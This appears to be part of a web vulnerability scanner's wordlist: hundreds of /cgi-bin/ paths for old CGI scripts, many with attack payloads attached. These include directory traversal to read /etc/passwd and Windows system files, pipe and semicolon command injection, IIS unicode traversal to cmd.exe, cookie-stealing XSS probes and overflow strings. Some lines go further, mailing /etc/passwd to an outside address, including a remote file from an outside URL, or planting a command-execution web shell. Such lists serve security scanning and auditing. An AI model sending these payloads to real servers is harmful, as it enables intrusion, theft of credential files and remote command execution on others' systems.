/cgi-bin/board/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
/cgi-bin/boards/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
/cgi-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/cgi-bin/boozt/admin/index.cgi?section=5&input=1
/cgi-bin/breakcal/calendar.cgi
/cgi-bin/bsguest.cgi
/cgi-bin/bsguest.cgi?email=x;ls
/cgi-bin/bslist.cgi
/cgi-bin/bslist.cgi?email=x;ls
/cgi-bin/BugList.CGI
/cgi-bin/bugzilla/BugList.CGI
/cgi-bin/bugzilla/DoEditVotes.CGI
/cgi-bin/bugzilla/Process_Bug.CGI
/cgi-bin/bugzilla/showdependencygraph.cgi
/cgi-bin/bugzilla/showdependencytree.cgi
/cgi-bin/bugzilla/showvotes.cgi
/cgi-bin/bugzilla/Show_Bug.CGI
/cgi-bin/build.cgi
/cgi-bin/bulk/bulk.cgi
/cgi-bin/buy.storefront/3baecb4a00025ad227a4c30e95010642/winnt/cmd.exe?/c+dir+c:
/cgi-bin/c32web.exe
/cgi-bin/c32web.exe/ChangeAdminPassword
/cgi-bin/c32web.exe/CheckError?error=53
/cgi-bin/c32web.exe/ShowAdminDir
/cgi-bin/cached_feed.cgi
/cgi-bin/cached_feed.cgi?../../../.+/etc/passwd
/cgi-bin/cachemgr.cgi
/cgi-bin/Calcium40.pl?Op=ShowIt&CalendarName=%3Cscript%3Ealert%2810602%29%3C%2Fscript%3E
/cgi-bin/calendar
/cgi-bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
/cgi-bin/calendar.pl
/cgi-bin/calendar/
/cgi-bin/calendar/calendar.pl?calendar=default&month=f00b4r
/cgi-bin/calendar/calendar.pl?calendar=default&year=f00b4r
/cgi-bin/calendar/calendar_admin.pl
/cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/passwd|
/cgi-bin/calendar/index.cgi
/cgi-bin/calendar_admin
/cgi-bin/calendar_admin.cgi
/cgi-bin/calendar_admin.pl
/cgi-bin/calendar_admin.pl?config=|cat%20/etc/passwd|
/cgi-bin/calender.pl
/cgi-bin/calender_admin.pl
/cgi-bin/cal_make.pl
/cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/hosts%00
/cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00
/cgi-bin/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00
/cgi-bin/cal_make.pl?p0=../../../../cal_make.pl%00
/cgi-bin/campas
/cgi-bin/campas?%0a/bin/cat%0a/etc/passwd
/cgi-bin/campas?%0acat%0a/etc/passwd%0a
/cgi-bin/campas?%0als%20-lFa%20/etc
/cgi-bin/carbo.dll
/cgi-bin/cardboard.cgi
/cgi-bin/carello/
/cgi-bin/Carello/add.exe
/cgi-bin/Carello/add.exe?c:oot.ini
/cgi-bin/Carello/Carello.dll
/cgi-bin/Carello/Carello.dll?CARELLOCODE=SITE2&VBEXE=C:\..\winnt\system32\cmd.exe%20/c%20echo%20test>c:\defcom.txt
/cgi-bin/Carello/Carello.dll?VBEXE=c:\.\winnt\system32\cmd.exe%20/c%20dir>c:\dir.txt
/cgi-bin/cart.pl
/cgi-bin/cart.pl?db='
/cgi-bin/cart.pl?db|cart.pl|All%20Items
/cgi-bin/cart.pl?env
/cgi-bin/cart32.exe
/cgi-bin/cart32.exe/cart32clientlist
/cgi-bin/cart32.exe/cart32clientlist?passwd=wemilo
/cgi-bin/cart32.exe/error
/cgi-bin/cart32.exe/expdate
/cgi-bin/cart32.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>
/cgi-bin/cart32.ini
/cgi-bin/cart32/tempfiles.list
/cgi-bin/cartmanager.cgi
/cgi-bin/cat
/cgi-bin/CatalogMgr.pl
/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('CSS')</script>
/cgi-bin/cbmc/forums.cgi
/cgi-bin/ccvsblame.cgi?file=/index.html&root=
/cgi-bin/cdomain.pl
/cgi-bin/ceilidh.exe
/cgi-bin/ceilidh.exe/ceilidh/?N4
/cgi-bin/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini
/cgi-bin/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini
/cgi-bin/cfgwiz.exe
/cgi-bin/cgforum.cgi
/cgi-bin/cgi-bin/
/cgi-bin/cgi-bin/cart.pl
/cgi-bin/cgi-lib.pl
/cgi-bin/cgi-lwgate/lwgate
/cgi-bin/cgi-lwgate/lwgate.cgi
/cgi-bin/cgi-lwgate/lwgate.pl
/cgi-bin/cgi-test.exe
/cgi-bin/cgi/
/cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd%00
/cgi-bin/cgiback.cgi
/cgi-bin/cgicso
/cgi-bin/cgicso?query=
/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>
/cgi-bin/cgicso?query=AAA
/cgi-bin/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script>
/cgi-bin/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script>
/cgi-bin/cgiemail.cgi/XXnonexistentXX
/cgi-bin/cgiemail/uargg.txt?0=0&1=1&2=2&256=256&array=array&a=a&i=i&c=c&arr=arr
/cgi-bin/cgiemail/XXnonexistentXX
/cgi-bin/cgiemail?required-webmaster=xxx@xxx.com&required-from=zzz@zzz.com&required-subject=spam%0aCC:address1@smap.com%20address2@smap.com%20address3@smap.com&comments=spam%20message
/cgi-bin/cgiforum.cgi?thesection=../../../../../../etc/hosts%00
/cgi-bin/cgiforum.pl
/cgi-bin/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00
/cgi-bin/cgimail.exe
/cgi-bin/CGImail.exe?%24Attach%24=file.txt&%24To%24=test@test.com
/cgi-bin/cgiproc?
/cgi-bin/cgitest.exe
/cgi-bin/cgitest.exe?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
/cgi-bin/cgiwrap
/cgi-bin/cgi_process
/cgi-bin/change-your-password.pl
/cgi-bin/change-your-password.pl~
/cgi-bin/ChangeLog
/cgi-bin/changelog.htm
/cgi-bin/CHANGELOG.html
/cgi-bin/changelog.txt
/cgi-bin/changepw.cgi
/cgi-bin/changepw.exe
/cgi-bin/CHANGES
/cgi-bin/CHANGES.txt
/cgi-bin/changes.xml
/cgi-bin/changs.txt
/cgi-bin/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie)</script>
/cgi-bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
/cgi-bin/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
/cgi-bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
/cgi-bin/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c%20dir%20C:\
/cgi-bin/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
/cgi-bin/citat.pl?/etc/passwd
/cgi-bin/citat.pl?|id|
/cgi-bin/class/mysql.class
/cgi-bin/classified
/cgi-bin/classified.cgi
/cgi-bin/classified.pl
/cgi-bin/classifieds
/cgi-bin/classifieds.cgi
/cgi-bin/classifieds.pl
/cgi-bin/classifieds/classifieds.cgi
/cgi-bin/cleanup.log
/cgi-bin/cleanup.txt
/cgi-bin/clemail.exe
/cgi-bin/click.pl
/cgi-bin/clickcount.pl
/cgi-bin/clickcount.pl?view=test
/cgi-bin/clickcount.pl?view=view
/cgi-bin/clickresponder.pl
/cgi-bin/clients.exe
/cgi-bin/clients.htx
/cgi-bin/cmd.exe?/c+dir
/cgi-bin/cmd1.exe?/c+dir
/cgi-bin/cmd32.exe
/cgi-bin/code.php
/cgi-bin/code.php3
/cgi-bin/colscripts/easymsgb.pl?print=|id|
/cgi-bin/com5..........................................................................................................................................................................................................................box
/cgi-bin/com5.java
/cgi-bin/com5.pl
/cgi-bin/commander.pl
/cgi-bin/commandit.cgi
/cgi-bin/comments.exe
/cgi-bin/commerce.cgi
/cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
/cgi-bin/commerce.cgi?page=../../../../etc/passwd%00index.html
/cgi-bin/commerce.cgi?page=check
/cgi-bin/common.inc
/cgi-bin/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
/cgi-bin/common/listrec.pl
/cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
/cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls|
/cgi-bin/compatible.cgi
/cgi-bin/compatible.cgi?<script>vulnerable
/cgi-bin/config.inc
/cgi-bin/configuration.inc
/cgi-bin/CONFIGURE
/cgi-bin/configure.txt
/cgi-bin/connect.inc
/cgi-bin/connection.inc
/cgi-bin/console.exe
/cgi-bin/console.exe?page_size=...
/cgi-bin/content-space
/cgi-bin/contents.htm
/cgi-bin/convert.bas
/cgi-bin/cookmail/cookmail
/cgi-bin/cookmail/cookmail.exe
/cgi-bin/copyright.txt
/cgi-bin/core
/cgi-bin/count.cgi
/cgi-bin/counter
/cgi-bin/counter-ord
/cgi-bin/counter.exe
/cgi-bin/counter.exe?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/cgi-bin/counter.pl
/cgi-bin/counterbanner
/cgi-bin/counterbanner-ord
/cgi-bin/counterfiglet
/cgi-bin/counterfiglet-ord
/cgi-bin/counterfiglet/nc/
/cgi-bin/counterfiglet/nc/f
/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
/cgi-bin/cowsconf/config.asc
/cgi-bin/cpmdaemon.cgi
/cgi-bin/cpshost.dll
/cgi-bin/Crazy-cgi/CrazyWWWBoard.cgi
/cgi-bin/Crazy-cgi/CrazyWWWBoardLE.cgi
/cgi-bin/Crazy-cgi/CrazyWWWBoardLE.exe
/cgi-bin/crazy3/CrazyWWWBoard.cgi
/cgi-bin/crazy3/CrazyWWWBoardLE.cgi
/cgi-bin/crazy3/CrazyWWWBoardLE.exe
/cgi-bin/crazy5/CrazyWWWBoard.cgi
/cgi-bin/crazy5/CrazyWWWBoardLE.cgi
/cgi-bin/crazy5/CrazyWWWBoardLE.exe
/cgi-bin/CrazyWWWBoard.cgi
/cgi-bin/CrazyWWWBoard2000p2/CrazyWWWBoard.cgi
/cgi-bin/CrazyWWWBoard2000p2/CrazyWWWBoardLE.cgi
/cgi-bin/CrazyWWWBoard2000p2/CrazyWWWBoardLE.exe
/cgi-bin/CrazyWWWBoardLE.cgi
/cgi-bin/CrazyWWWBoardLE.exe
/cgi-bin/createaccount.cgi
/cgi-bin/createaccount.cgi?login=Test%27Test@Test%27test.com&realname=Test+%27Test
/cgi-bin/CreatedByHP2
/cgi-bin/csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
/cgi-bin/csChatRBox.cgi?command=savesetup&setup=PERL_CODE_HERE
/cgi-bin/csfaq/
/cgi-bin/csFAQ/csFAQ.cgi?command=viewFAQ&database=/.test
/cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
/cgi-bin/csGuestbook.cgi?command=savesetup&setup=PERL_CODE_HERE
/cgi-bin/csh
/cgi-bin/csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
/cgi-bin/csLiveSupport.cgi?command=savesetup&setup=PERL_CODE_HERE
/cgi-bin/CSMailto.cgi
/cgi-bin/csnews.cgi?command=viewnews&database=none
/cgi-bin/CSNews.cgi?database=default%2edb&command=showadv&mpage=manager
/cgi-bin/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
/cgi-bin/csPassword.cgi
/cgi-bin/csPassword/csPassword.cgi?command=remove
/cgi-bin/csPassword/password.cgi.tmp
/cgi-bin/csSearch.cgi?command=savesetup&setup=*ShowSearchForm%3D*Login%3Dsub{print"<form+method%3Dpost+action%3DcsSearch.cgi>Enter+Command+(example:+ls+-l)<br><input+type%3Dtext+name%3Dcmd+size%3D99>+<input+type%3Dsubmit+value%3DExecute><hr><xmp>";$in{'cmd'}%26%26print`$in{'cmd'}+2>%261`;exit;};
/cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`
/cgi-bin/cssearch/
/cgi-bin/csSearch/csSearch.cgi?command=savesetup&setup=*ShowSearchForm%3D*Login%3Dsub{print"<form+method%3Dpost+action%3DcsSearch.cgi>Enter+Command+(example:+ls+-l)<br><input+type%3Dtext+name%3Dcmd+size%3D99>+<input+type%3Dsubmit+value%3DExecute><hr><xmp>";$in{'cmd'}%26%26print`$in{'cmd'}+2>%261`;exit;};
/cgi-bin/CSSearch/CSSearch.cgi?command=savesetup&setup=`set`
/cgi-bin/cstat.pl
/cgi-bin/csvform.pl?file=cat%20/etc/passwd%00|
/cgi-bin/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
/cgi-bin/customer.dbf
/cgi-bin/customers.dbf
/cgi-bin/cutecast
/cgi-bin/cutecast/
/cgi-bin/cutecast/members
/cgi-bin/cutecast/members/
/cgi-bin/CVS/Entries
/cgi-bin/CVS/Repository
/cgi-bin/CVS/Root
/cgi-bin/cvsblame.cgi?file=
/cgi-bin/cvslog.cgi?file=
/cgi-bin/cvslog.cgi?file=*&rev=&root=
/cgi-bin/cvsquery.cgi?branch=>&file=&date=
/cgi-bin/cvsquery.cgi?module=&branch=&dir=&file=&who=&sortby=Date&hours=2&date=week
/cgi-bin/cvsqueryform.cgi?cvsroot=/cvsroot&module=&branch=HEAD
/cgi-bin/cvsweb.cgi
/cgi-bin/cvsweb.cgi/anthill/postbug.php
/cgi-bin/cvsweb/cvsweb.cgi
/cgi-bin/cvsweb/src/usr.bin/rdist/expand.c
/cgi-bin/cwb-bin/CrazyWWWBoard.cgi
/cgi-bin/cwb-bin/CrazyWWWBoardLE.cgi
/cgi-bin/cwb-bin/CrazyWWWBoardLE.exe
/cgi-bin/cwb2000/CrazyWWWBoard.cgi
/cgi-bin/cwb2000/CrazyWWWBoardLE.cgi
/cgi-bin/cwb2000/CrazyWWWBoardLE.exe
/cgi-bin/CWMail.exe
/cgi-bin/c_download.cgi
/cgi-bin/dasp/
/cgi-bin/dasp/fm_shell.asp
/cgi-bin/data.dbf
/cgi-bin/data.htm
/cgi-bin/data.html
/cgi-bin/data.txt
/cgi-bin/database.inc
/cgi-bin/datafunc.inc
/cgi-bin/date
/cgi-bin/day5datacopier.cgi
/cgi-bin/day5datanotifier.cgi
/cgi-bin/day5notifier.cgi
/cgi-bin/db.cgi
/cgi-bin/db.dbf
/cgi-bin/db.inc
/cgi-bin/db2www.exe/../../db2www.ini
/cgi-bin/db2www/../../db2www.ini
/cgi-bin/db2www/library/document.d2w/report?uid=UNKNOWN&pwd=&search_type=SIMPLE&r_host=&last_page=db2www0022.html&fn=db2www.html
/cgi-bin/db2www/library/document.d2w/show
/cgi-bin/db4web_c/dbdirname//etc/passwd
/cgi-bin/dbconfig.inc
/cgi-bin/dbconn.inc
/cgi-bin/dbman/
/cgi-bin/dbman/db.cgi
/cgi-bin/dbman/db.cgi?db=bleh
/cgi-bin/dbman/db.cgi?db=no-db
/cgi-bin/dbman/db.cgi?db=tedb
/cgi-bin/dbmlparser.exe
/cgi-bin/dbsamp.htm
/cgi-bin/db_manager.cgi
/cgi-bin/dcadmin.cgi
/cgi-bin/dcboard.cgi
/cgi-bin/DCFORMS98.CGI
/cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
/cgi-bin/dcforum/
/cgi-bin/dcforum/dcboard.cgi
/cgi-bin/dcforum/dcforum.cgi?az=list&file=../../../../../../../../../../etc/passwd%00
/cgi-bin/dcforum/install_help.cgi
/cgi-bin/dcforumlib.pl
/cgi-bin/dcguest.cgi
/cgi-bin/dcguest/dcguest.cgi
/cgi-bin/DCShop/
/cgi-bin/DCShop/auth_data/auth_user_file.txt
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/debug-cgi
/cgi-bin/debug.asp
/cgi-bin/debug.cfg
/cgi-bin/debug.cgi
/cgi-bin/debug.dat
/cgi-bin/debug.htm
/cgi-bin/debug.html
/cgi-bin/debug.inc
/cgi-bin/debug.php
/cgi-bin/debug.php3
/cgi-bin/debug.pl
/cgi-bin/debug.txt
/cgi-bin/debugcgi
/cgi-bin/Default.asp
/cgi-bin/default.asp%20.pl
/cgi-bin/Default.aspx
/cgi-bin/deploy.exe
/cgi-bin/describecomponents.cgi
/cgi-bin/dfire.cgi
/cgi-bin/diagnose.cgi
/cgi-bin/diagnose.cgi?<script>vulnerable
/cgi-bin/dig.cgi
/cgi-bin/dir.txt
/cgi-bin/directory.php?dir=%3Bcat%20/etc/passwd
/cgi-bin/directory.php?dir=%3Bmore%20/etc/passwd
/cgi-bin/DirectoryListing.asp
/cgi-bin/directorypro.cgi
/cgi-bin/directorypro.cgi?want=showcat
/cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00
/cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../etc/passwd%00
/cgi-bin/dirs.txt
/cgi-bin/disk2server.cgi
/cgi-bin/displayTC.pl
/cgi-bin/dload.cgi?ID=14105
/cgi-bin/dmailweb.cgi
/cgi-bin/dmailweb.exe
/cgi-bin/dmailweb.exe?cmd=new&utoken=cerberus
/cgi-bin/dmailweb.ini
/cgi-bin/dnewsweb
/cgi-bin/dnewsweb.cgi
/cgi-bin/dnewsweb.exe
/cgi-bin/dnewsweb.exe?utag=%3Cscript%3Ealert%2810030%29%3C%2Fscript%3E
/cgi-bin/DoEditVotes.CGI
/cgi-bin/doexec.c
/cgi-bin/donothing
/cgi-bin/dose.pl?daily&facts.txt&|id|
/cgi-bin/dose.pl?daily&somefile.txt&|ls|
/cgi-bin/download.cgi
/cgi-bin/download.cgi?s=path&c=txt&f=fn
/cgi-bin/download.html
/cgi-bin/download.pl?s=path&c=txt&f=fn
/cgi-bin/dump-env-cgi
/cgi-bin/dump-env.cgi
/cgi-bin/dumpenv
/cgi-bin/dumpenv-cgi
/cgi-bin/dumpenv.cgi
/cgi-bin/dumpenv.pl
/cgi-bin/dumpenv.pl?<script>alert(document.cookie)</script>
/cgi-bin/dumpenvcgi
/cgi-bin/dvwssr.dll
/cgi-bin/e-cms/vis/vis.pl?s=../../../../../../etc/passwd%00
/cgi-bin/echo.bat
/cgi-bin/echo.bat?&dir+c:\
/cgi-bin/edit.pl
/cgi-bin/edit.pl|edit.pl
/cgi-bin/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name=%20;id;%20
/cgi-bin/edit_image.php?dn=1&userfile=edit_image.php&userfile_name=%20;id;
/cgi-bin/email.txt
/cgi-bin/email_list.txt
/cgi-bin/email_template.txt
/cgi-bin/empower?DB=bleh
/cgi-bin/empower?DB=UkRteamHole
/cgi-bin/empower?DB=whateverwhatever
/cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/emumail.cgi?type=../../../../../../../../../../etc/passwd%00
/cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/enivron.pl
/cgi-bin/enter.cgi
/cgi-bin/env-cgi
/cgi-bin/env.cgi
/cgi-bin/env.log
/cgi-bin/env.pl
/cgi-bin/envcgi
/cgi-bin/envdisplay.cgi
/cgi-bin/environ-cgi
/cgi-bin/environ.cgi
/cgi-bin/environ.pl
/cgi-bin/environ.pl+%00
/cgi-bin/environcgi
/cgi-bin/epages.admin
/cgi-bin/erba/start/
/cgi-bin/erba/start/%3Cscript%3Ealert(document.domain);%3C/script%3E
/cgi-bin/erba/start/<script>alert('CSS')</script>
/cgi-bin/error.log
/cgi-bin/errors.cgi
/cgi-bin/errors.log
/cgi-bin/errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
/cgi-bin/errors_log
/cgi-bin/error_log
/cgi-bin/eshop.pl/seite=;cat%20eshop.pl|
/cgi-bin/eshop.pl?seite=;cat%20/etc/passwd|
/cgi-bin/eshop.pl?seite=;id|
/cgi-bin/eshop.pl?seite=;ls|
/cgi-bin/esp?PAGE=<script>alert(document.cookie)</script>
/cgi-bin/everythingform.cgi
/cgi-bin/everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&e-mail=test@test.com
/cgi-bin/ews
/cgi-bin/ews/
/cgi-bin/ews/ews/architext_query.pl
/cgi-bin/ex-logger.pl
/cgi-bin/excite
/cgi-bin/excite/
/cgi-bin/excite/at-generate.cgi
/cgi-bin/excite;IFS="$";/bin/cat%20/etc/passwd|mail%20test@test.com
/cgi-bin/excite;IFS=\
/cgi-bin/executor.cgi
/cgi-bin/Extropia/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html
/cgi-bin/ezadmin.cgi
/cgi-bin/ezboard.cgi
/cgi-bin/ezman.cgi
/cgi-bin/ezmlm-cgi
/cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
/cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
/cgi-bin/ezshopper2/loadpage.cgi
/cgi-bin/ezshopper2/loadpage.cgi?id+/
/cgi-bin/ezshopper2/loadpage.cgi?id=|id|
